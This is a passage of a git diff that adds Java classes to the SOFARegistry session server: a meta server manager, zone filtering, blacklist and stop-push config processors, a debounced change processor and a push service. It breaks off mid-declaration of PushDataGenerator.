com.alipay.sofa.registry.server.shared.meta.AbstractMetaServerManager; +import com.google.common.annotations.VisibleForTesting; +import java.util.Collection; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author chen.zhu + *

Mar 15, 2021 + */ +public class SessionMetaServerManager extends AbstractMetaServerManager { + + @Autowired private SessionServerConfig sessionServerConfig; + + @Override + protected Collection getConfiguredMetaServerDomains() { + return sessionServerConfig.getMetaServerAddresses(); + } + + @Override + public int getRpcTimeoutMillis() { + return sessionServerConfig.getMetaNodeExchangeTimeoutMillis(); + } + + @Override + public int getServerPort() { + return sessionServerConfig.getMetaServerPort(); + } + + @VisibleForTesting + void setSessionServerConfig(SessionServerConfig sessionServerConfig) { + this.sessionServerConfig = sessionServerConfig; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/predicate/ZonePredicate.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/predicate/ZonePredicate.java new file mode 100644 index 000000000..6f4d6a203 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/predicate/ZonePredicate.java @@ -0,0 +1,54 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.predicate; + +import com.alipay.sofa.registry.core.model.ScopeEnum; +import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; +import java.util.function.Predicate; + +/** + * @author xiaojian.xj + * @version $Id: ZonePredicate.java, v 0.1 2020年11月12日 21:57 xiaojian.xj Exp $ + */ +public final class ZonePredicate { + private ZonePredicate() {} + + public static Predicate zonePredicate( + String dataId, + String clientCell, + ScopeEnum scopeEnum, + SessionServerConfig sessionServerConfig) { + Predicate zonePredicate = + (zone) -> { + if (!clientCell.equals(zone)) { + if (ScopeEnum.zone == scopeEnum) { + // zone scope subscribe only return zone list + return true; + + } else if (ScopeEnum.dataCenter == scopeEnum || ScopeEnum.global == scopeEnum) { + // disable zone config + if (sessionServerConfig.isInvalidForeverZone(zone) + && !sessionServerConfig.isInvalidIgnored(dataId)) { + return true; + } + } + } + return false; + }; + return zonePredicate; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/provideData/ProvideDataProcessor.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/provideData/ProvideDataProcessor.java new file mode 100644 index 000000000..1824e6f2c --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/provideData/ProvideDataProcessor.java @@ -0,0 +1,32 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.provideData; + +import com.alipay.sofa.registry.common.model.metaserver.ProvideData; + +/** + * @author shangyu.wh + * @version 1.0: ProvideDataProcessor.java, v 0.1 2019-10-09 17:26 shangyu.wh Exp $ + */ +public interface ProvideDataProcessor { + + void changeDataProcess(ProvideData provideData); + + void fetchDataProcess(ProvideData provideData); + + boolean support(ProvideData provideData); +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/provideData/ProvideDataProcessorManager.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/provideData/ProvideDataProcessorManager.java new file mode 100644 index 000000000..5f48f4f68 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/provideData/ProvideDataProcessorManager.java @@ -0,0 +1,57 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.provideData; + +import com.alipay.sofa.registry.common.model.metaserver.ProvideData; +import java.util.ArrayList; +import java.util.Collection; + +/** + * @author shangyu.wh + * @version 1.0: ProvideDataProcessorManager.java, v 0.1 2019-10-09 17:39 shangyu.wh Exp $ + */ +public class ProvideDataProcessorManager implements ProvideDataProcessor { + + private Collection provideDataProcessors = new ArrayList<>(); + + public void addProvideDataProcessor(ProvideDataProcessor provideDataProcessor) { + provideDataProcessors.add(provideDataProcessor); + } + + @Override + public void changeDataProcess(ProvideData provideData) { + for (ProvideDataProcessor provideDataProcessor : provideDataProcessors) { + if (provideDataProcessor.support(provideData)) { + provideDataProcessor.changeDataProcess(provideData); + } + } + } + + @Override + public void fetchDataProcess(ProvideData provideData) { + for (ProvideDataProcessor provideDataProcessor : provideDataProcessors) { + if (provideDataProcessor.support(provideData)) { + provideDataProcessor.fetchDataProcess(provideData); + } + } + } + + @Override + public boolean support(ProvideData provideData) { + return false; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/provideData/processor/BlackListProvideDataProcessor.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/provideData/processor/BlackListProvideDataProcessor.java new file mode 100644 index 000000000..db01b5065 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/provideData/processor/BlackListProvideDataProcessor.java @@ -0,0 +1,123 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.provideData.processor; + +import com.alipay.sofa.registry.common.model.ConnectId; +import com.alipay.sofa.registry.common.model.constants.ValueConstants; +import com.alipay.sofa.registry.common.model.metaserver.ProvideData; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.remoting.Channel; +import com.alipay.sofa.registry.remoting.Server; +import com.alipay.sofa.registry.remoting.exchange.Exchange; +import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; +import com.alipay.sofa.registry.server.session.filter.blacklist.BlacklistConstants; +import com.alipay.sofa.registry.server.session.filter.blacklist.BlacklistManager; +import com.alipay.sofa.registry.server.session.provideData.ProvideDataProcessor; +import com.alipay.sofa.registry.server.session.registry.Registry; +import java.util.*; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author shangyu.wh + * @version 1.0: BlackListProvideDataProcessor.java, v 0.1 2019-10-09 20:21 shangyu.wh Exp $ + */ +public class BlackListProvideDataProcessor implements ProvideDataProcessor { + + private static final Logger LOGGER = LoggerFactory.getLogger(BlackListProvideDataProcessor.class); + + @Autowired private SessionServerConfig sessionServerConfig; + + @Autowired private Registry sessionRegistry; + + @Autowired private Exchange boltExchange; + + @Autowired private BlacklistManager blacklistManager; + + @Override + public void changeDataProcess(ProvideData provideData) { + if (provideData == null) { + LOGGER.warn("Fetch session blacklist data null"); + return; + } + // black list data + final String data = ProvideData.toString(provideData); + if (data == null) { + LOGGER.warn("Fetch session blacklist content null"); + return; + } + LOGGER.info("Fetch session blacklist {}", data); + + Map>> blacklistConfigMap = + blacklistManager.convertBlacklistConfig(data); + clientOffBlackIp(blacklistConfigMap); + LOGGER.info("update BlacklistConfig", blacklistConfigMap); + } + + private void clientOffBlackIp(Map>> blacklistConfigMap) { + // TODO use the same handler with BlackListManager + if (blacklistConfigMap != null) { + Set ipSet = new HashSet(); + + for (Map.Entry>> configEntry : + blacklistConfigMap.entrySet()) { + if (BlacklistConstants.FORBIDDEN_PUB.equals(configEntry.getKey()) + || BlacklistConstants.FORBIDDEN_SUB_BY_PREFIX.equals(configEntry.getKey())) { + Map> typeMap = configEntry.getValue(); + if (typeMap != null) { + for (Map.Entry> typeEntry : typeMap.entrySet()) { + if (BlacklistConstants.IP_FULL.equals(typeEntry.getKey())) { + if (typeEntry.getValue() != null) { + ipSet.addAll(typeEntry.getValue()); + } + } + } + } + } + } + + sessionRegistry.remove(getIpConnects(ipSet)); + } + } + + public List getIpConnects(Set _ipList) { + + Server sessionServer = boltExchange.getServer(sessionServerConfig.getServerPort()); + + List connections = new ArrayList<>(); + + if (sessionServer != null) { + Collection channels = sessionServer.getChannels(); + for (Channel channel : channels) { + String ip = channel.getRemoteAddress().getAddress().getHostAddress(); + if (_ipList.contains(ip)) { + connections.add(ConnectId.of(channel.getRemoteAddress(), channel.getLocalAddress())); + } + } + } + + return connections; + } + + @Override + public void fetchDataProcess(ProvideData provideData) {} + + @Override + public boolean support(ProvideData provideData) { + return ValueConstants.BLACK_LIST_DATA_ID.equals(provideData.getDataInfoId()); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/provideData/processor/StopPushProvideDataProcessor.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/provideData/processor/StopPushProvideDataProcessor.java new file mode 100644 index 000000000..37d55c209 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/provideData/processor/StopPushProvideDataProcessor.java @@ -0,0 +1,75 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.provideData.processor; + +import com.alipay.sofa.registry.common.model.constants.ValueConstants; +import com.alipay.sofa.registry.common.model.metaserver.ProvideData; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; +import com.alipay.sofa.registry.server.session.provideData.ProvideDataProcessor; +import com.alipay.sofa.registry.server.session.registry.Registry; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author shangyu.wh + * @version 1.0: StopPushProvideDataProcessor.java, v 0.1 2019-10-09 18:53 shangyu.wh Exp $ + */ +public class StopPushProvideDataProcessor implements ProvideDataProcessor { + + private static final Logger LOGGER = LoggerFactory.getLogger(StopPushProvideDataProcessor.class); + + @Autowired private SessionServerConfig sessionServerConfig; + + @Autowired private Registry sessionRegistry; + + @Override + public void changeDataProcess(ProvideData provideData) { + if (provideData == null) { + LOGGER.info("Fetch session stopPushSwitch null"); + return; + } + + // push stop switch + final Boolean stop = ProvideData.toBool(provideData); + if (stop == null) { + LOGGER.info("Fetch session stopPushSwitch content null"); + return; + } + boolean prev = sessionServerConfig.isStopPushSwitch(); + sessionServerConfig.setStopPushSwitch(stop); + if (prev && !stop) { + // prev is stop, now close stop, trigger push + sessionRegistry.fetchChangDataProcess(); + } + LOGGER.info( + "Fetch session stopPushSwitch={}, prev={}, current={}", + stop, + prev, + sessionServerConfig.isStopPushSwitch()); + } + + @Override + public void fetchDataProcess(ProvideData provideData) { + changeDataProcess(provideData); + } + + @Override + public boolean support(ProvideData provideData) { + return ValueConstants.STOP_PUSH_DATA_SWITCH_DATA_ID.equals(provideData.getDataInfoId()); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/push/ChangeProcessor.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/push/ChangeProcessor.java new file mode 100644 index 000000000..2fdd0ea9e --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/push/ChangeProcessor.java @@ -0,0 +1,216 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.push; + +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; +import com.alipay.sofa.registry.util.ConcurrentUtils; +import com.alipay.sofa.registry.util.WakeUpLoopRunnable; +import com.google.common.collect.Maps; +import java.util.Iterator; +import java.util.LinkedHashMap; +import java.util.Objects; +import javax.annotation.PostConstruct; +import org.springframework.beans.factory.annotation.Autowired; + +public class ChangeProcessor { + private static final Logger LOGGER = LoggerFactory.getLogger(ChangeProcessor.class); + + @Autowired SessionServerConfig sessionServerConfig; + + Worker[] workers; + + @PostConstruct + public void init() { + this.workers = new Worker[sessionServerConfig.getDataChangeFetchTaskWorkerSize()]; + for (int i = 0; i < workers.length; i++) { + workers[i] = + new Worker( + sessionServerConfig.getDataChangeDebouncingMillis(), + sessionServerConfig.getDataChangeMaxDebouncingMillis()); + ConcurrentUtils.createDaemonThread("ChangeExecutor-" + i, workers[i]).start(); + } + } + + boolean fireChange( + String dataCenter, String dataInfoId, ChangeHandler handler, long expectDatumVersion) { + ChangeKey key = new ChangeKey(dataCenter, dataInfoId); + Worker worker = workerOf(key); + return worker.commitChange(key, handler, expectDatumVersion); + } + + interface ChangeHandler { + boolean onChange( + long startTimestamp, String dataCenter, String dataInfoId, long expectDatumVersion); + } + + static final class ChangeTask { + long startTimestamp; + final ChangeKey key; + final ChangeHandler changeHandler; + long expectDatumVersion; + final long expireTimestamp; + long expireDeadlineTimestamp; + + ChangeTask( + ChangeKey key, long expectDatumVersion, ChangeHandler changeHandler, long expireTimestamp) { + this.key = key; + this.changeHandler = changeHandler; + this.expectDatumVersion = expectDatumVersion; + this.expireTimestamp = expireTimestamp; + } + + void doChange() { + changeHandler.onChange(startTimestamp, key.dataCenter, key.dataInfoId, expectDatumVersion); + } + + @Override + public String toString() { + return "ChangeTask{" + + "key=" + + key + + ", version=" + + expectDatumVersion + + ", expire=" + + expireTimestamp + + ", deadline=" + + expireDeadlineTimestamp + + '}'; + } + } + + static final class Worker extends WakeUpLoopRunnable { + // task sorted by expire probably + final LinkedHashMap tasks = Maps.newLinkedHashMap(); + final int changeDebouncingMillis; + final int changeDebouncingMaxMillis; + + Worker(int changeDebouncingMillis, int changeDebouncingMaxMillis) { + this.changeDebouncingMillis = changeDebouncingMillis; + this.changeDebouncingMaxMillis = changeDebouncingMaxMillis; + } + + ChangeTask get(ChangeKey key) { + synchronized (tasks) { + return tasks.get(key); + } + } + + boolean commitChange(ChangeKey key, ChangeHandler handler, long expectDatumVersion) { + final long now = System.currentTimeMillis(); + final ChangeTask task = + new ChangeTask(key, expectDatumVersion, handler, now + changeDebouncingMillis); + task.startTimestamp = now; + + synchronized (tasks) { + final ChangeTask exist = tasks.get(key); + if (exist == null) { + task.expireDeadlineTimestamp = now + changeDebouncingMaxMillis; + tasks.put(key, task); + return true; + } + if (task.expectDatumVersion <= exist.expectDatumVersion) { + return false; + } + // compare with exist + if (task.expireTimestamp <= exist.expireDeadlineTimestamp) { + // not reach deadline, requeue to wait + task.expireDeadlineTimestamp = exist.expireDeadlineTimestamp; + task.startTimestamp = exist.startTimestamp; + // tasks is linkedMap, must remove the exist first, then enqueue in the tail + tasks.remove(key); + tasks.put(key, task); + } else { + // reach deadline, could not requeue, use exist.expire as newTask.expire + exist.expectDatumVersion = task.expectDatumVersion; + } + return true; + } + } + + ChangeTask getExpire() { + final long now = System.currentTimeMillis(); + synchronized (tasks) { + if (tasks.isEmpty()) { + return null; + } + Iterator it = tasks.values().iterator(); + final ChangeTask first = it.next(); + if (first.expireTimestamp <= now) { + it.remove(); + return first; + } + return null; + } + } + + @Override + public void runUnthrowable() { + for (; ; ) { + final ChangeTask task = getExpire(); + if (task == null) { + break; + } + try { + task.doChange(); + } catch (Throwable e) { + LOGGER.error("failed to doChange, {}", task); + } + } + } + + @Override + public int getWaitingMillis() { + return 100; + } + } + + static final class ChangeKey { + final String dataInfoId; + final String dataCenter; + + ChangeKey(String dataCenter, String dataInfoId) { + this.dataCenter = dataCenter; + this.dataInfoId = dataInfoId; + } + + @Override + public String toString() { + return dataInfoId + "@" + dataCenter; + } + + @Override + public boolean equals(Object o) { + if (this == o) return true; + if (o == null || getClass() != o.getClass()) return false; + ChangeKey changeKey = (ChangeKey) o; + return Objects.equals(dataInfoId, changeKey.dataInfoId) + && Objects.equals(dataCenter, changeKey.dataCenter); + } + + @Override + public int hashCode() { + return Objects.hash(dataInfoId, dataCenter); + } + } + + Worker workerOf(ChangeKey key) { + int n = (key.hashCode() & 0x7fffffff) % workers.length; + return workers[n]; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/push/FirePushService.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/push/FirePushService.java new file mode 100644 index 000000000..9bd07fe29 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/push/FirePushService.java @@ -0,0 +1,279 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.push; + +import static com.alipay.sofa.registry.server.session.push.PushMetrics.Fetch.*; + +import com.alipay.sofa.registry.common.model.SubscriberUtils; +import com.alipay.sofa.registry.common.model.store.DataInfo; +import com.alipay.sofa.registry.common.model.store.SubDatum; +import com.alipay.sofa.registry.common.model.store.Subscriber; +import com.alipay.sofa.registry.core.model.ScopeEnum; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; +import com.alipay.sofa.registry.server.session.cache.CacheService; +import com.alipay.sofa.registry.server.session.cache.DatumKey; +import com.alipay.sofa.registry.server.session.cache.Key; +import com.alipay.sofa.registry.server.session.cache.Value; +import com.alipay.sofa.registry.server.session.store.Interests; +import com.alipay.sofa.registry.server.shared.util.DatumUtils; +import com.alipay.sofa.registry.task.FastRejectedExecutionException; +import com.alipay.sofa.registry.task.KeyedThreadPoolExecutor; +import com.google.common.collect.Lists; +import java.net.InetSocketAddress; +import java.util.Collection; +import java.util.Collections; +import java.util.List; +import java.util.Map; +import javax.annotation.PostConstruct; +import org.springframework.beans.factory.annotation.Autowired; +import org.springframework.util.CollectionUtils; + +public class FirePushService { + private static final Logger LOGGER = LoggerFactory.getLogger(FirePushService.class); + + @Autowired SessionServerConfig sessionServerConfig; + + @Autowired CacheService sessionCacheService; + + @Autowired Interests sessionInterests; + + private KeyedThreadPoolExecutor registerFetchExecutor; + + @Autowired PushProcessor pushProcessor; + @Autowired ChangeProcessor changeProcessor; + final ChangeHandler changeHandler = new ChangeHandler(); + + @PostConstruct + public void init() { + registerFetchExecutor = + new KeyedThreadPoolExecutor( + "RegisterFetchExecutor", + sessionServerConfig.getDataChangeFetchTaskWorkerSize(), + sessionServerConfig.getDataChangeFetchTaskMaxBufferSize()); + } + + public boolean fireOnChange(String dataCenter, String dataInfoId, long expectVersion) { + try { + // TODO only supported local dataCenter + changeProcessor.fireChange(dataCenter, dataInfoId, changeHandler, expectVersion); + CHANGE_TASK_COUNTER.inc(); + return true; + } catch (Throwable e) { + LOGGER.error( + "failed to fireOnChange {}, dataCenter={}, expectVer={}", + dataInfoId, + dataCenter, + expectVersion, + e); + return false; + } + } + + public boolean fireOnPushEmpty(Subscriber subscriber) { + SubDatum emptyDatum = DatumUtils.newEmptySubDatum(subscriber, getDataCenterWhenPushEmpty()); + final long now = System.currentTimeMillis(); + PushCause cause = new PushCause(now, PushType.Empty, now); + processPush(cause, emptyDatum, Collections.singletonList(subscriber)); + PUSH_EMPTY_COUNTER.inc(); + LOGGER.info("firePushEmpty, {}", subscriber); + return true; + } + + public boolean fireOnRegister(Subscriber subscriber) { + try { + registerFetchExecutor.execute(subscriber.getDataInfoId(), new RegisterTask(subscriber)); + REGISTER_TASK_COUNTER.inc(); + return true; + } catch (Throwable e) { + handleFireOnRegisterException(subscriber, e); + return false; + } + } + + static void handleFireOnRegisterException(Subscriber subscriber, Throwable e) { + if (e instanceof FastRejectedExecutionException) { + LOGGER.error( + "failed to fireOnRegister {}, {}, {}", + subscriber.getDataInfoId(), + subscriber, + e.getMessage()); + return; + } + LOGGER.error("failed to fireOnRegister {}, {}", subscriber.getDataInfoId(), subscriber, e); + } + + public boolean fireOnDatum(SubDatum datum) { + try { + DataInfo dataInfo = DataInfo.valueOf(datum.getDataInfoId()); + Collection subscribers = sessionInterests.getInterests(dataInfo.getDataInfoId()); + final long now = System.currentTimeMillis(); + final PushCause cause = new PushCause(now, PushType.Temp, now); + processPush(cause, datum, subscribers); + PUSH_TEMP_COUNTER.inc(); + return true; + } catch (Throwable e) { + LOGGER.error("failed to fireOnDatum {}", datum, e); + return false; + } + } + + protected String getDataCenterWhenPushEmpty() { + // TODO cloud mode use default.datacenter? + return sessionServerConfig.getSessionServerDataCenter(); + } + + boolean doExecuteOnChange( + long startTimestamp, String dataCenter, String changeDataInfoId, long expectVersion) { + final SubDatum datum = getDatum(dataCenter, changeDataInfoId, expectVersion); + if (datum == null) { + // datum change, but get null datum, should not happen + LOGGER.error("[changeNil] {},{},{}", dataCenter, changeDataInfoId, expectVersion); + return false; + } + if (datum.getVersion() < expectVersion) { + LOGGER.error( + "[changeLessVer] {},{},{}<{}", + dataCenter, + changeDataInfoId, + datum.getVersion(), + expectVersion); + return false; + } + onDatumChange(startTimestamp, datum); + return true; + } + + private void onDatumChange(long startTimestamp, SubDatum datum) { + Map> scopes = + SubscriberUtils.groupByScope(sessionInterests.getDatas(datum.getDataInfoId())); + final long triggerPushTs = PushTrace.getTriggerPushTimestamp(datum); + final PushCause cause = new PushCause(startTimestamp, PushType.Sub, triggerPushTs); + for (Map.Entry> scope : scopes.entrySet()) { + processPush(cause, datum, scope.getValue()); + } + } + + private boolean processPush( + PushCause pushCause, SubDatum datum, Collection subscriberList) { + if (sessionServerConfig.isStopPushSwitch()) { + return false; + } + if (subscriberList.isEmpty()) { + return false; + } + subscriberList = + subscribersPushCheck(datum.getDataCenter(), datum.getVersion(), subscriberList); + if (CollectionUtils.isEmpty(subscriberList)) { + return false; + } + Map> group = + SubscriberUtils.groupBySourceAddress(subscriberList); + for (Map.Entry> e : group.entrySet()) { + final InetSocketAddress addr = e.getKey(); + final Map subscriberMap = e.getValue(); + pushProcessor.firePush(pushCause, addr, subscriberMap, datum); + } + return true; + } + + SubDatum getDatum(String dataCenter, String dataInfoId, long expectVersion) { + Key key = new Key(DatumKey.class.getName(), new DatumKey(dataInfoId, dataCenter)); + Value value = sessionCacheService.getValueIfPresent(key); + if (value != null) { + SubDatum datum = (SubDatum) value.getPayload(); + if (datum != null && datum.getVersion() >= expectVersion) { + // the expect version got + CACHE_HIT_COUNTER.inc(); + return datum; + } + } + CACHE_MISS_COUNTER.inc(); + // the cache is too old + sessionCacheService.invalidate(key); + value = sessionCacheService.getValue(key); + return value == null ? null : (SubDatum) value.getPayload(); + } + + private List subscribersPushCheck( + String dataCenter, Long version, Collection subscribers) { + List subscribersSend = Lists.newArrayList(); + for (Subscriber subscriber : subscribers) { + if (subscriber.checkVersion(dataCenter, version)) { + subscribersSend.add(subscriber); + } + } + return subscribersSend; + } + + final class ChangeHandler implements ChangeProcessor.ChangeHandler { + + @Override + public boolean onChange( + long startTimestamp, String dataCenter, String dataInfoId, long expectDatumVersion) { + try { + CHANGE_TASK_EXEC_COUNTER.inc(); + doExecuteOnChange(startTimestamp, dataCenter, dataInfoId, expectDatumVersion); + return true; + } catch (Throwable e) { + LOGGER.error( + "failed to do change Task, {}, dataCenter={}, expectVersion={}", + dataInfoId, + dataCenter, + expectDatumVersion, + e); + return false; + } + } + } + + boolean doExecuteOnSubscriber(String dataCenter, Subscriber subscriber) { + if (subscriber.hasPushed()) { + return false; + } + final String subDataInfoId = subscriber.getDataInfoId(); + SubDatum datum = getDatum(dataCenter, subDataInfoId, Long.MIN_VALUE); + if (datum == null) { + datum = DatumUtils.newEmptySubDatum(subscriber, dataCenter); + LOGGER.warn("[registerEmptyPush] {},{},{}", subDataInfoId, dataCenter, subscriber); + } + + PushCause cause = + new PushCause(System.currentTimeMillis(), PushType.Reg, subscriber.getRegisterTimestamp()); + processPush(cause, datum, Collections.singletonList(subscriber)); + return true; + } + + final class RegisterTask implements Runnable { + final Subscriber subscriber; + + RegisterTask(Subscriber subscriber) { + this.subscriber = subscriber; + } + + @Override + public void run() { + final String dataCenter = sessionServerConfig.getSessionServerDataCenter(); + try { + doExecuteOnSubscriber(dataCenter, subscriber); + } catch (Throwable e) { + LOGGER.error("failed to do register Task, dataCenter={}, {}", dataCenter, subscriber, e); + } + } + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/push/PushCause.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/push/PushCause.java new file mode 100644 index 000000000..054e900e9 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/push/PushCause.java @@ -0,0 +1,37 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.push; + +import com.alipay.sofa.registry.util.StringFormatter; + +public final class PushCause { + final long startTimestamp; + final long triggerTimestamp; + final PushType pushType; + + PushCause(long startTimestamp, PushType pushType, long triggerTimestamp) { + this.pushType = pushType; + this.triggerTimestamp = triggerTimestamp; + this.startTimestamp = startTimestamp; + } + + @Override + public String toString() { + return StringFormatter.format( + "PushCause{startTs={},triggerTs={},type={}}", startTimestamp, triggerTimestamp, pushType); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/push/PushDataGenerator.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/push/PushDataGenerator.java new file mode 100644 index 000000000..2a6c26335 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/push/PushDataGenerator.java @@ -0,0 +1,63 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.push; + +import com.alipay.sofa.registry.common.model.SubscriberUtils; +import com.alipay.sofa.registry.common.model.store.BaseInfo; +import com.alipay.sofa.registry.common.model.store.SubDatum; +import com.alipay.sofa.registry.common.model.store.Subscriber; +import com.alipay.sofa.registry.common.model.store.URL; +import com.alipay.sofa.registry.core.model.ReceivedData; +import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; +import com.alipay.sofa.registry.server.session.converter.ReceivedDataConverter; +import com.alipay.sofa.registry.server.session.converter.pb.ReceivedDataConvertor; +import com.alipay.sofa.registry.server.session.predicate.ZonePredicate; +import com.google.common.collect.Lists; +import java.util.Map; +import java.util.function.Predicate; +import org.springframework.beans.factory.annotation.Autowired; + +public class PushDataGenerator { + + @Autowired SessionServerConfig sessionServerConfig; + + public Object 